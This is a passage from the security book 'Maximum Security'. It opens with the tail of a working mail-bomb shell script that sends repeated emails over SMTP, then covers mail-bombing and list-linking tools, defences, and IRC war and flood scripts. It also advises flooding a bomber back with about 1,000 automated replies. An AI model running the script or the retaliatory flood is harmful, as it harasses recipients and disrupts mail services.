ch14.htm

来自「Maximum Security (First Edition) 网络安全 英文」· HTM 代码 · 共 1,271 行 · 第 1/5 页

echo quote data >> teltemp
echo quote . >> teltemp
echo quote quit >> teltemp
echo quit >> teltemp
echo -n "How many times should it be sent ?"
set amount = $<
set loop_count = 1
while ($loop_count <= $amount)
    echo "Done $loop_count"
    ftp -n $server 25 < teltemp
    @ loop_count++
end
rm ./teltemp
echo $amount e-mails complete to $name from $from@$server
# --------------------
# MailBomb by CyBerGoAT
</FONT></PRE>
<H3><FONT COLOR="#000077"><B>Bombtrack</B></FONT></H3>
<P>The Bombtrack utility is reportedly the first mail-bombing tool written for the
Macintosh platform. (This is of some significance. Programming a garden-variety utility
like this on the Microsoft Windows platform is simple, and can be accomplished almost
entirely with a visual design interface. Very little code needs to go into it. Writing
for the Mac platform, however, is a slightly different affair.)</P>
<P>Basically, Bombtrack is another run-of-the-mill bombing utility, widely available
at hacker sites across the Internet. The signature file for this application is</P>
<PRE><FONT COLOR="#0066FF">bombtrack.bin
</FONT></PRE>
<H3><FONT COLOR="#000077"><B>FlameThrower</B></FONT></H3>
<P>FlameThrower is a bombing utility written for Macintosh. Its main purpose is list
linking; it allows the user to subscribe his target to 100 lists. The binary is quite
large, considering its intended purpose. The author should get some credit for style
of design, but Macintosh users are fairly stylish as a rule. The signature for this
file is</P>
<PRE><FONT COLOR="#0066FF">flamethrower10b.sit.bin
</FONT></PRE>
<H3><FONT COLOR="#000077"><B>General Information About E-Mail Bombs</B></FONT></H3>
<P>E-mail bombing is nothing more than nuisance material. The cure is generally a
kill file or an exclusionary scheme. An <I>exclusionary scheme</I> is where you bar
entry of packets received from the source address. As discussed in Chapter 13, &quot;Techniques
to Hide One's Identity,&quot; obtaining the source address is a fairly simple process,
at least in a UNIX environment. Really, it involves no more than reading the message
in Mail as opposed to Pine or Elm; this will reveal the actual source address and
expand the path. Examining the complete path (even in Netscape Navigator, for example)
will give you the originating mail server.</P>
<P>If you maintain a site and malicious users from the void start bombing you, contact
their postmaster. This is usually quite effective; the user will be counseled that
this behavior is unnecessary and that it will not be tolerated. In most cases, this
proves to be a sufficient deterrent. (Some providers are even harsh enough to terminate
the account then and there.) However, if you are faced with a more difficult situation
(for example, the ISP couldn't care less if its users bombed the Internet collectively),
you might have to take more aggressive measures.</P>
<P>One such measure is to block traffic from the originating network at the router
level. (There are various packet-filtering techniques that you can apply.) However,
if this doesn't suit your needs (or your temperament), there are other, more proactive
solutions. One fine technique that's guaranteed to work is this: Fashion a script
that catches the offending e-mail address each time it connects to your mail server.
For each such connection request, terminate the connection and autorespond with a
polite, 10-page advisory on how such attacks violate acceptable use policies and
that, under certain circumstances, they may violate the law. After the offending
party has received 1,000 or so returns of this nature, his previously unconcerned
provider will bring the offender onto the carpet and promptly chop off his fingers.</P>
<P>There are renegade providers around, and there is absolutely no reason that you
cannot undertake such action. After all, you have done no more than refuse the connection
and issue an advisory. It is hardly your fault if the warning was not heeded. Notwithstanding
various pieces of legislation to bring the Internet into the civilized world, it
is still much like the Old West. If another provider refuses to abide by the law
and generally accepted practices, take it down to the OK Corral. One last point here:
To make this technique especially effective, be sure to CC the postmaster of the
bomber's site with each autorespond message.


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>NOTE:</B></FONT><B> </B>These aggressive techniques can
	only be implemented in the event of a garden-variety mail-bombing situation. This
	will not work for list linking because list linking is a process that obscures the
	true origin address of the attacker. The only way to obtain that address if is the
	list owner (whoever is responsible for the mailing list server) runs logging utilities
	and actually keeps those logs.</P>
	<P>For example, suppose the list accepts subscription requests from a Web page. It
	can easily obtain the address by checking the HTTP server connection log (this file
	is normally called <TT>access.log</TT>). HTTP servers record the originating IP address
	of each connection. However, the large majority of lists do not accept subscription
	requests through their Web pages. Instead, they use garden-variety mail. The percentage
	of system administrators who heavily log connection requests to their mail server
	is fairly small. Moreover, to trace the attacker, you would need help from more than
	just the system administrator at the mail list site; suppose the attacker was using
	a dial-up connection with a dynamically allocated IP address. After you acquire that
	IP from the mail-list system administrator, you must convince the attacker's ISP
	to cooperate by forwarding its logs to you.</P>
	<P>Furthermore, unless the attacker's ISP is running good logging utilities, the
	logs you receive will only demonstrate a list of possible suspects (the users who
	were logged to that IP or dial-up at the hour of the attack). Even more research
	may be required. For this reason, list linking has become far more popular than run-of-the-mill
	mail bombing. 
<HR>


</BLOCKQUOTE>

<H3><FONT COLOR="#000077"><B>IRC: Flash Bombs and War Scripts</B></FONT></H3>
<P>Flash utilities (also referred to as <I>flash bombs</I>) belong to a class of
munitions that are used on Internet Relay Chat (IRC). IRC is the last free frontier
because it is spontaneous and uncontrollable. It consists of people chatting endlessly,
from virtual channel to virtual channel. There is no time for advertisements, really,
and even if you tried to push your product there, you would likely be blown off the
channel before you had a chance to say much of anything.</P>
<P>In this respect, IRC is different from any other networked service on the Internet.
IRC is grass roots and revolutionary Internet at its best (and worst), and with all
likelihood, it will remain that way forever.</P>
<P>IRC was developed in Finland in the late 1980s. Some suggest that its purpose
was to replace other networking tools of a similar ilk (for example, the talk service
in UNIX). Talk is a system whereby two individuals can communicate on text-based
terminals. The screens of both users split into two parts, one for received text
and one for sent text. In this respect, talk operates a lot like a direct link between
machines using any of the popular communications packages available on the market
(Qmodem and ProComm Plus are good examples). The major difference is that talk occurs
over the Internet; the connection is bound by e-mail address. For example, to converse
with another party via talk, you issue a command as follows:</P>
<PRE><FONT COLOR="#0066FF">talk person@provider.com
</FONT></PRE>
<P>This causes the local talk program to contact the remote talk daemon. If the person
is available (and hasn't disabled incoming connections via talk), the screen soon
splits and the conversation begins.</P>
<P>IRC differs from talk in that many people can converse at the same time. This
was a major innovation, and IRC chatting has become one of the most popular methods
of communication on the Net.


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>NOTE:</B></FONT><B> </B>IRC is one of the few places on
	the Internet where an individual can successfully evade even advanced detection techniques.
	For instance, many software pirates and crackers frequent IRC. If they are extremely
	paranoid, they change servers and screen names every half hour or so. Moreover, they
	often create their own channels instead of frequenting those already available. Finally,
	file transfers can be done over IRC, directly from point A to point B. No record
	is left of such a transfer. This differs from other types of transfers that may be
	closely logged. Similar types of transfers can also be made if at least one of the
	parties is running servers such as FTP, HTTP, or Gopher. However, IRC allows such
	a transfer without server software running on either box. 
<HR>


</BLOCKQUOTE>

<P>Internet warfare (that is, &quot;hand-to-hand&quot; combat) often occurs on IRC
because IRC is lawless--a place where almost anything goes. Briefly, it works like
this: Once connected to an IRC server, a user can go into a series of channels called
<I>chat spaces</I>. Inside each channel, there is an <I>operator</I>, or a person
who has some authority--authority, for example, to &quot;kick&quot; any user forwarding
information that the operator deems objectionable. (<I>Kicking</I> is where the target
is bumped from the channel and is forced to reconnect.) The operator can also ban
a user from the channel, either temporarily or semi-permanently.


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>NOTE:</B></FONT><B> </B>The first person to connect to (or
	create) an empty channel is automatically the operator by default. Unless he voluntarily
	relinquishes that authority, he has complete control of the channel and can institute
	kick or ban actions against anyone who subsequently joins the channel. 
<HR>


</BLOCKQUOTE>

<P>As you might expect, people who get kicked or banned often respond angrily. This
is where combat begins. Since the introduction of IRC, dozens of munitions have been
developed for use in IRC combat. They are described in the following sections.
<H4><FONT COLOR="#000077"><TT>crash.irc</TT></FONT></H4>
<P>Although not originally designed for it, <TT>crash.irc</TT> will blow a Netcom
target out of IRC. In other words, an attacker uses this utility to force a Netcom
user from a channel (Netcom is a very large ISP located in northern California).
<H4><FONT COLOR="#000077"><TT>botkill2.irc</TT></FONT></H4>
<P>The <TT>botkill2.irc</TT> script kills bots. <I>Bots</I> are other automated scripts
that run in the IRC environment.
<H4><FONT COLOR="#000077"><B>ACME</B></FONT></H4>
<P>ACME is a typical &quot;war&quot; script. Its features include flooding (where
you fill the channel with garbage, thereby denying others the ability to communicate)
and the ability to auto-kick someone from a channel.


<BLOCKQUOTE>
	<P>
<HR>
<FONT COLOR="#000077"><B>NOTE:</B></FONT><B> </B>Flooding can deny other users access
	simply because of the volume of text run through the server. It works like this:
	The attacker unleashes a flooding utility that generates many, many lines of text.
	This text is printed across the terminals of all users currently logged to the channel.
	Because this text saturates the write-ahead buffer of all client programs, the victims
	must wait for the flood to stop before they can type any further messages. Interestingly,
	many flood scripts actually fashion images from various text characters. If you watch
	such a flood for a moment, you will see some type of image develop. This activity
	is similar to ASCII art, which is now a popular form of artistic expression on text-based
	terminals that cannot display actual graphics. Of course, flooding is very irritating
	and therefore, few users are willing to tolerate it, even if the art that results
	is attractive. 
<HR>


</BLOCKQUOTE>

<H4><FONT COLOR="#000077"><B>Saga</B></FONT></H4>
<P>Saga is a sophisticated and complex script; it performs more functions than those
used in combat. The main features are that it can

<UL>
	<LI>Kick and ban a target, for either a specified time period or 30-90 seconds<BR>
	<BR>
	
	<LI>Strip an operator of his authoritative status<BR>
	<BR>
	
	<LI>Screen out all users from a given domain<BR>
	<BR>
	
	<LI>Blow all users from the channel<BR>
	<BR>
	
	<LI>Enter a channel and kill all operators (this is called <I>takeover mode</I>)
</UL>

<H4><FONT COLOR="#000077"><B>THUGS</B></FONT></H4>
<P>THUGS is another war script. It blows various client programs from IRC, kicks
unwanted users, seizes control of a channel, and hangs at least one known Windows
IRC program.
<H4><FONT COLOR="#000077"><B>The 7th Sphere</B></FONT></H4>
<P>Another war script worth mentioning is The 7th Sphere. The help file describes
the utility as &quot;An Equal Opportunity Destroyer.&quot; Here are some of its capabilities:

<UL>
	<LI>Blow everyone from a channel<BR>
	<BR>
	
	<LI>Incisive user flooding (selectively flood only one or more users as opposed to
	the entire channel)<BR>
	<BR>
	
	<LI>Colliding capabilities (the capability to cause a collision of nicknames on IRC
	servers, thereby knocking a user with an identical nickname from IRC)<BR>
	<BR>
	
	<LI>Armor (prevents you from falling victim to another war script)<BR>
	<BR>
	
	<LI>Nuke facility (enables you to attack and successfully disable those using Windows
	IRC clients)<BR>
	<BR>
	
	<LI>Built-in port scanner
</UL>